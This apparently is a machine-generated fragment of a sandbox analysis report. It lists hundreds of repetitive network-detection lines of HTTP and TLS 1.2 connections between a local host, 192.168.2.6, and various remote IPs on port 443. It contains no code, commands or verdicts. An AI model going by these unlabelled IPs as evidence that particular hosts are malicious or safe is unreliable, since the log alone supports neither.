                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63421
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52549
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50127
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54726
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50122
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54964
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50126
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50125
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50367
                Source: unknownNetwork traffic detected: HTTP traffic on port 62804 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 63138 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 65344 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49387
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49384
                Source: unknownNetwork traffic detected: HTTP traffic on port 50943 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 56393 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 56894 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54904
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54903
                Source: unknownNetwork traffic detected: HTTP traffic on port 56011 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 63731 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49375
                Source: unknownNetwork traffic detected: HTTP traffic on port 49696 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56099
                Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63613
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63857
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63618
                Source: unknownNetwork traffic detected: HTTP traffic on port 54710 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 63379 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 57907 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51408
                Source: unknownNetwork traffic detected: HTTP traffic on port 56115 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 56381 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 55116 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 56568 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 56160 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57197
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51416
                Source: unknownNetwork traffic detected: HTTP traffic on port 63997 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58296
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58292
                Source: unknownNetwork traffic detected: HTTP traffic on port 54303 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58294
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58293
                Source: unknownNetwork traffic detected: HTTP traffic on port 56429 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 56383 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 56142 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 63457 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50055
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50058
                Source: unknownNetwork traffic detected: HTTP traffic on port 55114 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55990
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54661
                Source: unknownNetwork traffic detected: HTTP traffic on port 56107 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50102 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63124
                Source: unknownNetwork traffic detected: HTTP traffic on port 63171 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63125
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65304
                Source: unknownNetwork traffic detected: HTTP traffic on port 55102 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55759
                Source: unknownNetwork traffic detected: HTTP traffic on port 65169 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55518
                Source: unknownNetwork traffic detected: HTTP traffic on port 52524 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 63125 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57933
                Source: unknownNetwork traffic detected: HTTP traffic on port 65261 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50067
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55993
                Source: unknownNetwork traffic detected: HTTP traffic on port 54854 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57932
                Source: unknownNetwork traffic detected: HTTP traffic on port 56004 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50072
                Source: unknownNetwork traffic detected: HTTP traffic on port 65455 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63133
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63132
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65313
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63379
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63138
                Source: unknownNetwork traffic detected: HTTP traffic on port 50502 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65330
                Source: unknownNetwork traffic detected: HTTP traffic on port 56532 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56618
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63392
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63394
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56856
                Source: unknownNetwork traffic detected: HTTP traffic on port 54878 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50114 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 57903 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50708 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50390 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56612
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55530
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54682
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54680
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63143
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63389
                Source: unknownNetwork traffic detected: HTTP traffic on port 51416 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 65421 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 55148 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63162
                Source: unknownNetwork traffic detected: HTTP traffic on port 56682 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63161
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63163
                Source: unknownNetwork traffic detected: HTTP traffic on port 63857 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 54613 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55773
                Source: unknownNetwork traffic detected: HTTP traffic on port 55952 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 56886 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 65330 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63155
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63154
                Source: unknownNetwork traffic detected: HTTP traffic on port 50665 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63157
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65333
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63156
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63158
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54618
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54859
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54858
                Source: unknownNetwork traffic detected: HTTP traffic on port 56014 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54857
                Source: unknownNetwork traffic detected: HTTP traffic on port 62978 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50493
                Source: unknownNetwork traffic detected: HTTP traffic on port 50055 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54614
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54856
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54855
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54613
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54612
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54854
                Source: unknownNetwork traffic detected: HTTP traffic on port 63161 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54611
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54853
                Source: unknownNetwork traffic detected: HTTP traffic on port 51369 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50215 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 56680 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55712
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54620
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54867
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
                Source: unknownNetwork traffic detected: HTTP traffic on port 63421 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54623
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54865
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55952
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54622
                Source: unknownNetwork traffic detected: HTTP traffic on port 56564 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50067 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 54775 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 63157 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57904
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57907
                Source: unknownNetwork traffic detected: HTTP traffic on port 49433 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54874
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56811
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54873
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54872
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57903
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57902
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54878
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51369
                Source: unknownNetwork traffic detected: HTTP traffic on port 49206 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 54682 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 56426 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50104 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 62966 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63343
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65520
                Source: unknownNetwork traffic detected: HTTP traffic on port 54306 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 52572 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63120
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54887
                Source: unknownNetwork traffic detected: HTTP traffic on port 56002 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 65376 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54892
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54890
                Source: unknownNetwork traffic detected: HTTP traffic on port 65189 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65532
                Source: unknownNetwork traffic detected: HTTP traffic on port 50126 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63115
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63116
                Source: unknownNetwork traffic detected: HTTP traffic on port 50122 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65395
                Source: unknownNetwork traffic detected: HTTP traffic on port 52550 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55107
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55102
                Source: unknownNetwork traffic detected: HTTP traffic on port 54594 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56676
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56677
                Source: unknownNetwork traffic detected: HTTP traffic on port 56540 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 55186 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56682
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55110
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55111
                Source: unknownNetwork traffic detected: HTTP traffic on port 55083 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56680
                Source: unknownNetwork traffic detected: HTTP traffic on port 54680 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56681
                Source: unknownNetwork traffic detected: HTTP traffic on port 63477 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55113
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55114
                Source: unknownNetwork traffic detected: HTTP traffic on port 54611 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55115
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55116
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55120
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55121
                Source: unknownNetwork traffic detected: HTTP traffic on port 50134 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56695
                Source: unknownNetwork traffic detected: HTTP traffic on port 56402 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 63705 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 63025 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 56385 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 57028 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57548
                Source: unknownNetwork traffic detected: HTTP traffic on port 63163 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 56006 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 56677 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56456
                Source: unknownNetwork traffic detected: HTTP traffic on port 56728 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65169
                Source: unknownNetwork traffic detected: HTTP traffic on port 63133 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 55530 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 54726 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 55878 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64098
                Source: unknownNetwork traffic detected: HTTP traffic on port 55156 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 54856 -> 443
                Source: unknownHTTPS traffic detected: 31.13.88.1:443 -> 192.168.2.6:63291 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.26.14.180:443 -> 192.168.2.6:63132 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.105.84:443 -> 192.168.2.6:63133 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 170.114.52.4:443 -> 192.168.2.6:63427 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.65.1:443 -> 192.168.2.6:63476 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.22.74.220:443 -> 192.168.2.6:63479 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.105.84:443 -> 192.168.2.6:63409 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.18.32.109:443 -> 192.168.2.6:63138 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 138.197.59.199:443 -> 192.168.2.6:63421 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.161.136.2:443 -> 192.168.2.6:63392 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 87.233.198.20:443 -> 192.168.2.6:63155 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 201.134.41.61:443 -> 192.168.2.6:63143 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 82.221.28.171:443 -> 192.168.2.6:63731 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 45.60.0.44:443 -> 192.168.2.6:63857 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 36.255.71.45:443 -> 192.168.2.6:63458 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.105.84:443 -> 192.168.2.6:63115 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 178.16.128.181:443 -> 192.168.2.6:63618 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.134.125.175:443 -> 192.168.2.6:63426 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.88.1:443 -> 192.168.2.6:63696 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.105.84:443 -> 192.168.2.6:63116 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 44.233.131.115:443 -> 192.168.2.6:63487 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 47.251.24.188:443 -> 192.168.2.6:63532 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.60.188:443 -> 192.168.2.6:63415 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 34.149.46.130:443 -> 192.168.2.6:63477 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 195.85.23.95:443 -> 192.168.2.6:63977 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.216.144.5:443 -> 192.168.2.6:63695 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 177.74.1.157:443 -> 192.168.2.6:63705 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.18.32.109:443 -> 192.168.2.6:63457 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.141.96.53:443 -> 192.168.2.6:63410 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.161.150.69:443 -> 192.168.2.6:64608 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 54.183.63.241:443 -> 192.168.2.6:63976 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.212.100.154:443 -> 192.168.2.6:63700 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.78.166.130:443 -> 192.168.2.6:63933 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.212.100.154:443 -> 192.168.2.6:63699 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 163.247.44.239:443 -> 192.168.2.6:63758 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.78.166.130:443 -> 192.168.2.6:63890 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 164.100.128.15:443 -> 192.168.2.6:63978 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 36.255.71.45:443 -> 192.168.2.6:63997 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 164.100.213.210:443 -> 192.168.2.6:64053 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 202.81.112.32:443 -> 192.168.2.6:63834 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 192.168.2.6:63389 -> 172.67.170.147:443 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 82.221.28.171:443 -> 192.168.2.6:65218 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 34.149.46.130:443 -> 192.168.2.6:65376 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.134.125.175:443 -> 192.168.2.6:65347 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 195.85.23.95:443 -> 192.168.2.6:65375 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.105.84:443 -> 192.168.2.6:65348 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.255.105.79:443 -> 192.168.2.6:65345 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 138.197.59.199:443 -> 192.168.2.6:65344 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 54.183.63.241:443 -> 192.168.2.6:65355 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 87.233.198.20:443 -> 192.168.2.6:65304 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.88.1:443 -> 192.168.2.6:65427 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.212.100.154:443 -> 192.168.2.6:65532 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.141.96.53:443 -> 192.168.2.6:65424 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.65.1:443 -> 192.168.2.6:49387 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 170.114.52.2:443 -> 192.168.2.6:65449 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 44.195.133.145:443 -> 192.168.2.6:65420 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 138.197.59.199:443 -> 192.168.2.6:65421 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 45.60.0.44:443 -> 192.168.2.6:49206 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.105.84:443 -> 192.168.2.6:65454 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.105.84:443 -> 192.168.2.6:65455 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.22.74.220:443 -> 192.168.2.6:65482 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 34.149.46.130:443 -> 192.168.2.6:49384 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.134.125.175:443 -> 192.168.2.6:65422 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 77.240.114.212:443 -> 192.168.2.6:65520 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 170.114.52.4:443 -> 192.168.2.6:49722 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.216.144.5:443 -> 192.168.2.6:49733 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.5.25:443 -> 192.168.2.6:49731 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 186.113.7.204:443 -> 192.168.2.6:49732 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.105.84:443 -> 192.168.2.6:49691 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 44.195.133.145:443 -> 192.168.2.6:49730 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 44.199.96.179:443 -> 192.168.2.6:49679 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 34.149.46.130:443 -> 192.168.2.6:50020 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 195.85.23.95:443 -> 192.168.2.6:49734 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 13.249.120.4:443 -> 192.168.2.6:50036 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.141.96.53:443 -> 192.168.2.6:49690 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.26.14.180:443 -> 192.168.2.6:49693 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.216.144.5:443 -> 192.168.2.6:49713 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.4.32.216:443 -> 192.168.2.6:49724 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 177.74.1.157:443 -> 192.168.2.6:49739 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.105.84:443 -> 192.168.2.6:49723 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.66.40.88:443 -> 192.168.2.6:49728 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.66.43.117:443 -> 192.168.2.6:49765 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.120.71.26:443 -> 192.168.2.6:50054 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 178.16.128.181:443 -> 192.168.2.6:50031 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.161.150.69:443 -> 192.168.2.6:50055 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.105.84:443 -> 192.168.2.6:50072 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 44.199.96.179:443 -> 192.168.2.6:49699 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 45.60.0.44:443 -> 192.168.2.6:50122 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 44.195.133.145:443 -> 192.168.2.6:50147 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.170.147:443 -> 192.168.2.6:49726 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.161.150.69:443 -> 192.168.2.6:49689 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 202.81.112.32:443 -> 192.168.2.6:49375 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.18.41.153:443 -> 192.168.2.6:49696 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 170.114.52.2:443 -> 192.168.2.6:50145 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 138.66.39.205:443 -> 192.168.2.6:49719 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.255.105.79:443 -> 192.168.2.6:50113 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.212.100.154:443 -> 192.168.2.6:49718 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.78.166.130:443 -> 192.168.2.6:49774 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 164.100.128.15:443 -> 192.168.2.6:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.203.148.34:443 -> 192.168.2.6:49949 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.22.74.220:443 -> 192.168.2.6:50102 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.78.166.130:443 -> 192.168.2.6:49775 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 36.255.71.45:443 -> 192.168.2.6:49759 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 41.33.126.100:443 -> 192.168.2.6:50126 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 138.197.59.199:443 -> 192.168.2.6:50058 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 41.33.126.100:443 -> 192.168.2.6:50127 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.218.172:443 -> 192.168.2.6:50114 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.65.1:443 -> 192.168.2.6:50218 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.161.136.2:443 -> 192.168.2.6:50104 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 201.134.41.61:443 -> 192.168.2.6:50103 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 170.114.52.4:443 -> 192.168.2.6:50502 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 82.221.28.171:443 -> 192.168.2.6:50132 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 195.85.23.95:443 -> 192.168.2.6:50133 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.88.1:443 -> 192.168.2.6:50511 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 77.240.114.212:443 -> 192.168.2.6:50390 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.134.125.175:443 -> 192.168.2.6:50134 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.105.84:443 -> 192.168.2.6:50367 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 87.233.198.20:443 -> 192.168.2.6:50125 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.105.84:443 -> 192.168.2.6:50460 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.5.25:443 -> 192.168.2.6:50373 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.161.136.2:443 -> 192.168.2.6:50492 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.216.144.5:443 -> 192.168.2.6:50709 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.159.135.232:443 -> 192.168.2.6:50146 version: TLS 1.2
